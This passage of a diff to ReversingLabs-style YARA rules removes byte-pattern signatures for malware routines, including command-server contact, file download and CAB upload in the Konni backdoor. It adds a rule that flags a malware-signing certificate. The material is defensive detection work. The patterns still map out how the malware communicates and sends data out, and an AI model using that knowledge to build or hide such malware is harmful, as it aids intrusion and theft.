-            8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ??
-            48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 8B 45 ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3
-        }
-		$contact_c2_server = {
-            55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? 48 8D 45
-            ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 85 ?? ?? ?? ?? 49 89 D0 48 8D 15 ?? ??
-            ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 50 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ??
-            ?? ?? 48 8B 55 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 4C 8D 45
-            ?? 48 8B 55 ?? 48 8D 8D ?? ?? ?? ?? 48 89 4C 24 ?? 48 8D 4D ?? 48 89 4C 24 ?? 4D 89
-            C1 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ??
-            48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48
-            8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1
-            E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74 ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ??
-            ?? 48 8D 95 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 4D ?? 48 8D 55 ??
-            48 8B 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? BB
-            ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 89 D8
-            EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89
-            C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ??
-            48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 89
-            C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C1
-            E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3
-        }
-		$parse_c2_response = {
-            55 53 48 83 EC ?? 48 8D 6C 24 ?? 48 89 4D ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48
-            8D 55 ?? 48 8D 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45
-            ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ??
-            ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8
-            ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C1 48 8B 55 ?? 48
-            8B 45 ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B
-            55 ?? 48 01 C2 48 8B 45 ?? 49 89 D0 BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45
-            ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89
-            D8 48 89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48
-            89 C1 E8 ?? ?? ?? ?? 90 48 83 C4 ?? 5B 5D C3
-        }
-		$download_file_from_c2_p1 = {
-            55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? 4C 89 45
-            ?? 4C 89 4D ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 5D ?? 48 8B 55 ??
-            48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ??
-            ?? 49 89 D0 48 89 C2 48 89 D9 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 88 45 ?? 48 8D 85 ?? ??
-            ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 0F B6 45 ?? 83 F0 ?? 84 C0 0F 84 ?? ?? ?? ?? 48 8D 85
-            ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ??
-            48 89 C2 48 8D 85 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF
-            D0 89 45 ?? 83 7D ?? ?? 0F 95 C0 84 C0 74 ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48
-            8D 55 ?? 48 8B 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45
-            ?? 48 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 9D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ??
-            48 89 C1 E8 ?? ?? ?? ?? 48 89 C2 48 8B 45 ?? 49 89 D9 49 89 D0 BA ?? ?? ?? ?? 48 89
-            C1 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 8D 45 ?? 48
-        }
-		$download_file_from_c2_p2 = {
-            89 C1 E8 ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 49 89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1
-            E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 8D 45 ?? 48 8B 55 ?? 49
-            89 D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05
-            ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 8B 4D ?? 48 8D 55 ?? 49 89 C8 48
-            89 C1 E8 ?? ?? ?? ?? 90 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8
-            ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ??
-            ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ??
-            EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89
-            C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3
-            48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 8B
-            45 ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3
-        }
-		$reply_to_c2_server = {
-            55 53 48 81 EC ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 4D ?? 48 89 55 ?? 4C 89 45
-            ?? 4C 89 4D ?? 48 8B 55 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ??
-            48 8B 55 ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8B 55 ?? 49 89
-            D0 48 8D 15 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05 ??
-            ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 8D ?? ?? ?? ?? 48 8D 55 ?? 49 89
-            C8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 8D 55 ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8
-            ?? ?? ?? ?? 48 8D 55 ?? 48 8B 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8
-            ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ??
-            48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB
-            ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1
-            E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48
-            8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 81
-            C4 ?? ?? ?? ?? 5B 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $anti_sandbox_detect_environment ) and ( $collect_host_information ) and ( $contact_c2_server ) and ( $parse_c2_response ) and ( all of ( $download_file_from_c2_p* ) ) and ( $reply_to_c2_server )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REDWOOD MARKETING SOLUTIONS INC." and pe.signatures [ i ] . serial == "1d:36:c4:f4:39:d6:51:50:35:89:31:8f" and 1651518469 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Backdoor_Konni : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_26F855A25890B749578F13E4B9459768 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Konni backdoor."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c45c23c6-be15-58cc-ae4d-631bed4a3bb2"
-		date = "2023-12-07"
-		modified = "2023-12-07"
+		id = "d873b0d4-dff5-5ee2-a70f-b067602b217e"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/backdoor/Win64.Backdoor.Konni.yara#L1-L205"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "37c45e3ed23ca9f4de876f666c9f6d9bf7eee5cb1650b02cdd9f58e2ccc4b5cb"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10698-L10714"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "35bfa39ef8f03d10af884f288278ea6ad3aff31cbae111057c2b619c6dc0a752"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "Konni"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$network_communication_p1 = {
-            48 8B C4 53 55 57 41 54 41 55 41 56 41 57 48 83 EC ?? 48 8B 3D ?? ?? ?? ?? 45 33 FF
-            48 8B D9 4C 8D A7 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 49 8B CC 44 89 78 ?? 44 89 78
-            ?? 45 8B F7 44 89 78 ?? 41 8B EF E8 ?? ?? ?? ?? 4C 8D 8F ?? ?? ?? ?? 4C 8D 05 ?? ??
-            ?? ?? BA ?? ?? ?? ?? 49 8B CC 48 89 5C 24 ?? 48 89 7C 24 ?? E8 ?? ?? ?? ?? 48 8D 9F
-            ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 41 BD ?? ?? ?? ?? 45 33 C9 45 33 C0 33 C9 41 8B
-            D5 44 89 7C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 89 44 24 ?? 48 85 C0 75 ?? 83 C8 ??
-            48 83 C4 ?? 41 5F 41 5E 41 5D 41 5C 5F 5D 5B C3 4C 89 7C 24 ?? 44 89 7C 24 ?? 41 B8
-            ?? ?? ?? ?? 45 33 C9 48 8B D3 48 8B C8 C7 44 24 ?? ?? ?? ?? ?? 48 89 B4 24 ?? ?? ??
-            ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F0 48 85
-            C0 0F 84 ?? ?? ?? ?? 4C 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 45
-            33 C9 4D 8B C4 48 8B C8 4C 89 7C 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 89 7C 24
-            ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 74 ?? 45 33 C9 45 33 C0 33 D2 48 8B C8 44 89
-            7C 24 ?? FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 48 8B CB 85 C0 74 ?? 48 8D 94 24 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 45 33 C9 48 8B CB 45 33 C0 33 D2 FF 15 ?? ?? ??
-            ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ??
-            41 8B C5 E9 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 85 C0 75 ?? 48 8B CB EB ?? FF C0 B9 ??
-            ?? ?? ?? 8B D0 89 84 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B E0 48 85 C0 74 ?? 44 8B
-        }
-		$network_communication_p2 = {
-            84 24 ?? ?? ?? ?? 33 D2 48 8B C8 E8 ?? ?? ?? ?? 45 33 C9 4C 89 7C 24 ?? 48 8D 0D ??
-            ?? ?? ?? 45 8D 41 ?? BA ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 4C 8B E8 48 8B CB 48 83 F8 ?? 75 ?? 45 33 C9 45 33 C0 33 D2 FF 15
-            ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ??
-            ?? ?? ?? 83 C8 ?? E9 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 49
-            8B D4 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 0F 1F 00 44 39 BC 24
-            ?? ?? ?? ?? 74 ?? 48 8D 15 ?? ?? ?? ?? 49 8B CC 41 8B EF E8 ?? ?? ?? ?? 48 85 C0 0F
-            45 EF 3B EF 74 ?? 44 8B 84 24 ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 49 8B D4 49 8B CD
-            4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ?? 44 03 B4 24 ?? ?? ?? ?? 33
-            D2 49 8B CC E8 ?? ?? ?? ?? 44 8B 84 24 ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 49 8B D4
-            48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 7C 24 ?? 49 8B CD FF 15 ??
-            ?? ?? ?? 49 8B CC FF 15 ?? ?? ?? ?? 45 33 C9 45 33 C0 33 D2 48 8B CB FF 15 ?? ?? ??
-            ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ??
-            83 C8 ?? 45 85 F6 0F 44 E8 8B C5 48 8B B4 24 ?? ?? ?? ?? 48 83 C4 ?? 41 5F 41 5E 41
-            5D 41 5C 5F 5D 5B C3
-        }
-		$handle_c2_commands_p1 = {
-            48 89 5C 24 ?? 48 89 74 24 ?? 57 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4
-            48 89 84 24 ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? 48 8D 54 24 ?? 33 FF 48 8B CE 89 7C 24
-            ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? 48 8B 15 ?? ??
-            ?? ?? 48 8B 08 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 4B
-            ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 4B ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
-            75 ?? 48 8B 4B ?? 8D 50 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 4C 24 ?? 33 D2 41 B8
-            ?? ?? ?? ?? 66 89 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 4B ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ??
-            48 8B 15 ?? ?? ?? ?? 48 8B 4B ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 53 ?? 48 8D 0D ??
-            ?? ?? ?? 45 33 C0 FF 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 4B ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 4B ?? E8 ??
-            ?? ?? ?? 69 C0 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48
-            8B 4B ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 4B ?? E8 ?? ?? ?? ?? 69 C0 ?? ?? ?? ?? 89
-        }
-		$handle_c2_commands_p2 = {
-            05 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 63 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 4C CB ?? E8
-            ?? ?? ?? ?? 48 8B CE 85 C0 75 ?? 8D 50 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 D2 E8 ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 0B E8 ?? ?? ?? ?? 48 63 4C 24 ??
-            48 8B 15 ?? ?? ?? ?? 48 8B 4C CB ?? 85 C0 75 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 63 4C
-            24 ?? 48 8D 15 ?? ?? ?? ?? 48 8B 4C CB ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 3B 48 83
-            C9 ?? 33 C0 66 F2 AF 33 D2 48 F7 D1 48 8D 0C 4E E8 ?? ?? ?? ?? EB ?? 48 8B 3B 48 83
-            C9 ?? 33 C0 66 F2 AF 8D 50 ?? 48 F7 D1 48 8D 0C 4E E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ??
-            ?? 85 C0 75 ?? 8D 48 ?? EB ?? 33 C9 E8 ?? ?? ?? ?? 8B F8 48 8B CB FF 15 ?? ?? ?? ??
-            8B C7 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B
-            5B ?? 49 8B 73 ?? 49 8B E3 5F C3
-        }
-		$create_cab_file_and_upload_p1 = {
-            48 89 5C 24 ?? 55 56 57 41 54 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48
-            8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 4C 8B 3D ?? ?? ?? ?? 33 DB 48 8B F1
-            48 8D 4D ?? 33 D2 41 B8 ?? ?? ?? ?? 44 8B E3 89 5C 24 ?? 89 5C 24 ?? 66 89 5D ?? E8
-            ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 89 9D ?? ?? 00 00 E8 ??
-            ?? ?? ?? 33 C0 48 8D 4C 24 ?? 66 89 5C 24 ?? 48 89 44 24 ?? 89 44 24 ?? 66 89 44 24
-            ?? FF 15 ?? ?? ?? ?? 0F B7 54 24 ?? 0F B7 4C 24 ?? 44 0F B7 44 24 ?? 0F B7 44 24 ??
-            0F B7 7C 24 ?? 89 54 24 ?? 89 44 24 ?? 89 4C 24 ?? 89 7C 24 ?? 44 89 44 24 ?? 4C 8D
-            05 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 8D 4D ?? 33 D2 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 55 ?? B9 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 4C 8D 4D ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? 45 33 C0 FF 15 ?? ?? ??
-            ?? 48 8D 4D ?? FF 15 ?? ?? ?? ?? 8D 53 ?? 48 8B CE E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ??
-            ?? 48 8B C8 48 8B F8 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ??
-            ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D
-            15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8
-            ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 48
-        }
-		$create_cab_file_and_upload_p2 = {
-            8D 4D ?? 48 8B D6 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 0B C0 E9 ?? ?? ?? ?? 48 8D 55 ?? 45
-            33 C0 48 8B CE FF 15 ?? ?? ?? ?? 45 33 C9 48 89 5C 24 ?? 48 8D 4D ?? 45 8D 41 ?? BA
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ??
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 83 F8 ?? 75 ?? 8B C3 EB ?? 33 D2 48 8B C8
-            FF 15 ?? ?? ?? ?? 8B F0 85 C0 75 ?? 48 8B CF FF 15 ?? ?? ?? ?? 8B C3 EB ?? FF C6 B9
-            ?? ?? ?? ?? 8B D6 44 8B EE FF 15 ?? ?? ?? ?? 4C 8B E0 48 85 C0 75 ?? 48 8B CF FF 15
-            ?? ?? ?? ?? 8B C3 EB ?? 4D 8B C5 33 D2 48 8B C8 E8 ?? ?? ?? ?? 4C 8D 4C 24 ?? 44 8B
-            C6 49 8B D4 48 8B CF 48 89 5C 24 ?? FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 8B
-            44 24 ?? 89 44 24 ?? 85 C0 75 ?? 83 C8 ?? E9 ?? ?? ?? ?? 48 8D 4D ?? 4C 89 B4 24 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 44 8B 6C 24 ?? B9 ?? ?? ?? ?? 41 83 C5 ?? 41 8B FD 41 8B
-            D5 48 89 7C 24 ?? FF 15 ?? ?? ?? ?? 4C 8B F0 48 85 C0 0F 84 ?? ?? ?? ?? 44 8B C7 33
-            D2 48 8B C8 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 33
-            C0 48 83 C9 ?? 4C 8D 86 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? 66 F2 AF 49 89 00 49 89 40
-            ?? 48 F7 D1 49 89 40 ?? 49 89 40 ?? 48 FF C9 03 C9 74 ?? 8B D1 48 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? EB ?? 48 8B F3 49 89 B7 ?? ?? ?? ?? 48 85 F6 0F 84 ?? ?? ?? ?? 44 8B
-        }
-		$create_cab_file_and_upload_p3 = {
-            44 24 ?? 4D 8B CE 49 8B D4 48 8B CE 44 89 6C 24 ?? E8 ?? ?? ?? ?? 49 8B 8F ?? ?? ??
-            ?? 48 85 C9 74 ?? E8 ?? ?? ?? ?? 49 8B CC 49 89 9F ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48
-            83 C9 ?? 33 C0 48 8D BD ?? ?? ?? ?? 66 F2 AF 48 F7 D1 41 8D 84 4D ?? ?? ?? ?? B9 ??
-            ?? ?? ?? 8B D0 89 44 24 ?? FF 15 ?? ?? ?? ?? 4C 8B E8 48 85 C0 0F 84 ?? ?? ?? ?? 44
-            8B 44 24 ?? 33 D2 48 8B C8 E8 ?? ?? ?? ?? 8B 54 24 ?? 4C 8D 8D ?? ?? ?? ?? 4C 8D 05
-            ?? ?? ?? ?? 49 8B CD E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 49 8B D6 8B C8 4C 8B C7 89 44 24
-            ?? 49 03 CD E8 ?? ?? ?? ?? 8B 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 03 CF 41 B8 ?? ?? ??
-            ?? 49 03 CD E8 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 49 8D 8F ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 45 33 C9 45 33 C0 41 8D 51 ?? 33 C9 89 5C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F0 48
-            85 C0 0F 84 ?? ?? ?? ?? 48 89 5C 24 ?? 89 5C 24 ?? 49 8D 97 ?? ?? ?? ?? 41 B8 ?? ??
-            ?? ?? 45 33 C9 48 8B C8 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 5C 24
-            ?? FF 15 ?? ?? ?? ?? 4C 8B E0 48 85 C0 0F 84 ?? ?? ?? ?? 49 8D 8F ?? ?? ?? ?? 33 D2
-            41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4D 8D 8F ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 49 8D 8F
-            ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 7C 24 ?? E8 ?? ?? ?? ?? 48 89 5C 24 ?? C7 44 24 ??
-            ?? ?? ?? ?? 4D 8D 87 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 45 33 C9 49 8B CC 48 89 5C 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 5C 24 ?? FF 15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74
-        }
-		$create_cab_file_and_upload_p4 = {
-            8B 44 24 ?? 48 8D 15 ?? ?? ?? ?? 4D 8B CD 41 B8 ?? ?? ?? ?? 48 8B CF 89 44 24 ?? FF
-            15 ?? ?? ?? ?? 85 C0 74 ?? 49 8B CD FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 45 33 C9 45 33
-            C0 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 75 ?? 45 33 C9 45 33 C0 33 D2 48 8B CF FF 15 ??
-            ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 49 8B CC FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 74 ?? FF C0 B9 ?? ?? ?? ?? 8B
-            D0 89 44 24 ?? FF 15 ?? ?? ?? ?? 4C 8B E8 48 85 C0 75 ?? 45 33 C9 45 33 C0 33 D2 48
-            8B CF FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 49 8B CC FF 15 ?? ?? ?? ?? 48 8B
-            CE FF 15 ?? ?? ?? ?? 83 C8 ?? EB ?? 44 8B 44 24 ?? 33 D2 48 8B C8 E8 ?? ?? ?? ?? 44
-            8B 44 24 ?? 4C 8D 4C 24 ?? 49 8B D5 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15
